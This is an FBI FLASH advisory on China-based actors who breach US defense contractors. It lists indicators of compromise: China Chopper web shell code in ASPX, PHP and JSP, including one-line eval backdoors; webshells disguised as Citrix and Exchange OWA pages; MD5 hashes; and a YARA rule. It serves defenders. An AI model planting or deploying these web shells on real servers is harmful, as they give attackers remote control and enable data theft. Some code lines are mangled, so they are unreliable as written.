This FLASH is an update to FLASH A-000064-MW. FBI is providing an update due to typographical errors in the Hash values, Snort Rules, and Yara Rules listed therein.
The FBI is providing the following information with HIGH confidence:
The FBI has obtained information regarding a group of cyber actors who have compromised and stolen sensitive military information from US cleared defense contractors (CDCs) through cyber intrusions. This group utilizes infrastructure emanating from China to conduct their nefarious computer network exploitation (CNE) activities. Information obtained from victims and subsequent analysis indicates that they were targeted based on their US Navy Seaport Enhanced contracts. The actors did not target information pertaining to a specific contract but instead stole all information that they accessed via their malicious cyber activities. Any activity related to this group detected on a network should be considered an indication of a compromise requiring extensive mitigation and contact with law enforcement.
Technical Details
The FBI is providing the following information with HIGH confidence:
The U.S. government and private industry have observed this group across a variety of intrusions leveraging a selected number of openly accessible tools and known server vulnerabilities to exploit victim networks. This group conducts reconnaissance on victims through their publicly available web pages and review documents related to contracts posted on company websites. Following the reconnaissance, the cyber actors gain initial access to networks through un-patched vulnerabilities in the victim’s outward facing servers.
Following such an exploit, this group has been observed using a select number of tools to collect credentials and move laterally through the network.
The U.S. government and private industry have identified the tools listed below as indicators of compromise (IOCs) employed by this group. While these tools are very common, the U.S. government and private industry have observed an increase in intrusion activities that were executed with these tools.
China Chopper Web shell- This chopper web shell is used to allow remote access to a compromised web server. The China Chopper web shell can be deployed by using a few different single lines of code. The China Chopper web shell can be written in any common web language that supports server-side scripting (e.g. asp, cfm, php, javascript etc.).
ASPX payload
<%@ Page Language=”Jscript”%><%eval(Request.Item[“password”], “unsafe”);%>
<% WebServices.InitalizeWebServices (“shell_password”);%>
MD5 Hash: 3300ac4025e515402612842bff0aa119
<%// style.aspx
// Copyright (c) 2007 – 2010 Citrix Systems, Inc. All Rights Reserved.
// Web Interface 5.3.0.0
%>
<%WebServices.InitalizeWebServices(“Citrix.Systems.Ime”);%>
<!–#include file=”~/app_data/serverscripts/include.aspxf”–>
System.WebServices.dll
MD5 Hash: 8a6043d95d816ad63225365bd3794f55
This Function can not use now..\ z1/ 0 z21’yyyy-MM-dd HH:mm:ss /c
kSELECT [name] FROM master.dbo.sysdatabases ORDER BY 1 use w;SELECT
[name] FROM sysobjects WHERE (xtype=’U’) ORDER BY 1USE [{0}];SELECT
A.[name],B.[name] FROM syscolumns A,systypes B where
A.id=object_id(‘{1}’) and A.xtype=B.xtype ORDER BY A.colid()|\SELECT
EXEC DECLARE ExecuteResult OK_ CsharpChopperServerScriptRunner By
zcgonvh , Version 0.0.0.1 Released, Public Final , FullChopperRunner.
<br />k<h3>Warning:</h3><br/>This program only used by <span
style=”color:red”>Site Administrtor</span> . Please confirm your
identity , or has a authorization from administrator. <br/>
MD5 Hash: 2e47de670b47442292970412945904ae
<%@ Page language=”c#” Codebehind=”Error.aspx.cs”
AutoEventWireup=”false”
Inherits=”Microsoft.Exchange.Clients.Owa.Core.Error” %>
<%@ Import Namespace=”Microsoft.Exchange.Clients” %>
<%@ Import Namespace=”Microsoft.Exchange.Clients.Owa.Core” %>
<%@ Import Namespace=”Microsoft.Exchange.Clients.Owa.Premium” %>
<!– {698798E9-889B-4145-ACFC-474C378C7B4F} –>
<html dir=”<%=(SessionContext != null && SessionContext.IsRtl) ? “rtl”
: “ltr”%>”>
<% // Any urls to resources in this file, must be absolute urls.
The error page can load as a response to any request
// made by the client, since it does by an internal redirect on
the server and not as a 302 issued to the client.
// Therefore, there is no way of knowing where a relative url
will take you. For example, this page can load as a
// result of this request “http://servername/owa/auth/logon.aspx”
or this request
// “http://servername/owa/ev.owa?oeh=1&ae=dostuff”
//
%>
<head>
<meta http-equiv=”Content-Type” content=”text/html; CHARSET=utf-
8″>
<title><%=
LocalizedStrings.GetHtmlEncoded(Strings.IDs.ErrorTitle) %></title>
<%WebServices.InitalizeWebServices(“OwaUrl.ApplicationRoot.Ime”);%>
<link type=”text/css” rel=”stylesheet”
href=”<%=ResourcePath%>14.2.390.1/themes/base/premium.css”>
<link type=”text/css” rel=”stylesheet”
href=”<%=ResourcePath%>14.2.390.1/themes/resources/<%=
Utilities.GetDefaultCultureFontCssFileUrl(OwaContext) %>”>
<style>
<% if (Utilities.IsViet()) { %>
body, html
{
font-family:Helvetica, Tahoma !important;
}
<% } %>
</style>
MD5 Hash: 5001ef50c7e869253a7c152a638eab8a
MD5 Hash: 8aa603ee2454da64f4c70f24cc0b5e08
MD5 Hash: ad8288227240477a95fb023551773c84
MD5 Hash: acba8115d027529763ea5c7ed6621499
MD5 Hash: f2ac6532ca6220ea4cb1720b81e74007
PHP payload
<?php @eval($_POST[‘password’]);?>
JSP payload
<%
If(request.getParameter(“f”)!=null)(newjava.io(FileOutputStream(application.getRealPath(“\\”)+request.getParameter(“f”))).write{request.getParameter(“t”).getBytes()};
%>
Yara Rules:
rule webshell_chinachopper_csharp
{
strings:
$pdbfrag = “ChopperSreverForCsharp”
$ban1 = “CsharpChopperServerScriptRunner By zcgonvh”
ascii wide
$chop_a = “ChopperApi_A_Get_LocalDirectory”
$chop_b = “ChopperApi_B_GetFileList”
condition:
2 of them
}